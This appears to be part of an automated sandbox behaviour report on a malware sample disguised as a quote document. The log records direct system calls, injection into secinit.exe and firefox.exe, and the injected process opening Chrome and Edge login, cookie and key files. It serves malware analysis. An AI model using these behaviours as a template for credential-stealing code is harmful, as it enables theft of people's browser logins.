Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: NULL target: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: NULL target: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: NULL target: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: fVnaqDZrZDB.exe, 00000005.00000000.1742070788.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895459944.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000000.1889293889.0000000000D30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fVnaqDZrZDB.exe, 00000005.00000000.1742070788.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895459944.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000000.1889293889.0000000000D30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fVnaqDZrZDB.exe, 00000005.00000000.1742070788.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895459944.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000000.1889293889.0000000000D30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: fVnaqDZrZDB.exe, 00000005.00000000.1742070788.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000005.00000002.3895459944.0000000001470000.00000002.00000001.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000000.1889293889.0000000000D30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior